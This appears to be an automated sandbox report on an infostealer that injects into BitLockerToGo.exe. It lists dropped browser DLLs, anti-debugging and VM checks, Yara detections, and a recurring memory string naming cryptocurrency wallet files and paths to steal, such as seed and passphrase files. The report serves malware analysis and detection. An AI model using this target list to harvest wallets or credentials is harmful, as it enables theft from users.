                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0300BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_0300BE70
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0300DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0300DA80
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03013EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_03013EA0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0300F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0300F6B0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_030016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_030016D0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03014910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_03014910
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0300E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0300E430
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0300DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0300DE10
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0300ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_0300ED20
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03014570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,2_2_03014570
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_030138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_030138B0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03017ED0 GetSystemInfo,wsprintfA,2_2_03017ED0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: AAFBAKEC.2.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                    Source: AAFBAKEC.2.drBinary or memory string: discord.comVMware20,11696494690f
                    Source: AAFBAKEC.2.drBinary or memory string: AMC password management pageVMware20,11696494690
                    Source: AAFBAKEC.2.drBinary or memory string: outlook.office.comVMware20,11696494690s
                    Source: AAFBAKEC.2.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                    Source: AAFBAKEC.2.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                    Source: AAFBAKEC.2.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                    Source: AAFBAKEC.2.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                    Source: AAFBAKEC.2.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                    Source: AAFBAKEC.2.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                    Source: AAFBAKEC.2.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                    Source: AAFBAKEC.2.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: AAFBAKEC.2.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                    Source: AAFBAKEC.2.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003547000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware]H-4
                    Source: AAFBAKEC.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                    Source: AAFBAKEC.2.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                    Source: Setup-Pro.exe, 00000000.00000002.1572696766.000000000053B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: AAFBAKEC.2.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003547000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0zZ
                    Source: AAFBAKEC.2.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                    Source: AAFBAKEC.2.drBinary or memory string: tasks.office.comVMware20,11696494690o
                    Source: AAFBAKEC.2.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                    Source: AAFBAKEC.2.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                    Source: AAFBAKEC.2.drBinary or memory string: dev.azure.comVMware20,11696494690j
                    Source: AAFBAKEC.2.drBinary or memory string: global block list test formVMware20,11696494690
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003547000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: AAFBAKEC.2.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                    Source: AAFBAKEC.2.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                    Source: AAFBAKEC.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                    Source: AAFBAKEC.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                    Source: AAFBAKEC.2.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                    Source: AAFBAKEC.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                    Source: AAFBAKEC.2.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                    Source: AAFBAKEC.2.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_2-57163
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_2-57177
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_2-58342
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_2-57166
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_2-57183
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_2-57006
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_2-57206
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0301B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0301B33A
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_030045C0 VirtualProtect ?,00000004,00000100,000000002_2_030045C0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03019C10 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_03019C10
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03019750 mov eax, dword ptr fs:[00000030h]2_2_03019750
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03007710 GetProcessHeap,RtlAllocateHeap,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,2_2_03007710
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0301B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0301B33A
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0301CEEA SetUnhandledExceptionFilter,2_2_0301CEEA
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0301AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0301AD48
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCAB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6CCAB66C
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCAB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6CCAB1F7
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: Setup-Pro.exe PID: 7596, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7772, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Setup-Pro.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3000000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Setup-Pro.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3000000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03019600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_03019600
                    Source: C:\Users\user\Desktop\Setup-Pro.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2FB9008Jump to behavior
                    Source: C:\Users\user\Desktop\Setup-Pro.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3000000Jump to behavior
                    Source: C:\Users\user\Desktop\Setup-Pro.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3001000Jump to behavior
                    Source: C:\Users\user\Desktop\Setup-Pro.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 301E000Jump to behavior
                    Source: C:\Users\user\Desktop\Setup-Pro.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 302B000Jump to behavior
                    Source: C:\Users\user\Desktop\Setup-Pro.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 325C000Jump to behavior
                    Source: C:\Users\user\Desktop\Setup-Pro.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCAB341 cpuid 2_2_6CCAB341
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_03017B90
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\Setup-Pro.exeQueries volume information: C:\Users\user\Desktop\Setup-Pro.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Setup-Pro.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Setup-Pro.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Setup-Pro.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Setup-Pro.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03018B60 GetSystemTime,2_2_03018B60
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03017850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,2_2_03017850
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03017A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,2_2_03017A30

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 2.2.BitLockerToGo.exe.3000000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.Setup-Pro.exe.2ab8000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup-Pro.exe.27aa000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup-Pro.exe.27aa000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup-Pro.exe.27f8000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup-Pro.exe.27f8000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup-Pro.exe.2ab8000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup-Pro.exe.2ab8000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.BitLockerToGo.exe.3000000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.Setup-Pro.exe.2ab8000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1837091006.0000000003547000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1585102260.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1507758122.00000000029D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1585102260.00000000027F6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1585102260.00000000027A8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1586077537.00000000029D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7772, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7772, type: MEMORYSTR
                    Source: BitLockerToGo.exe, 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: BitLockerToGo.exe, 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                    Source: BitLockerToGo.exe, 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\window-state.json*
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\jaxx\Local Storage\\file__0.localstorage
                    Source: BitLockerToGo.exe, 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
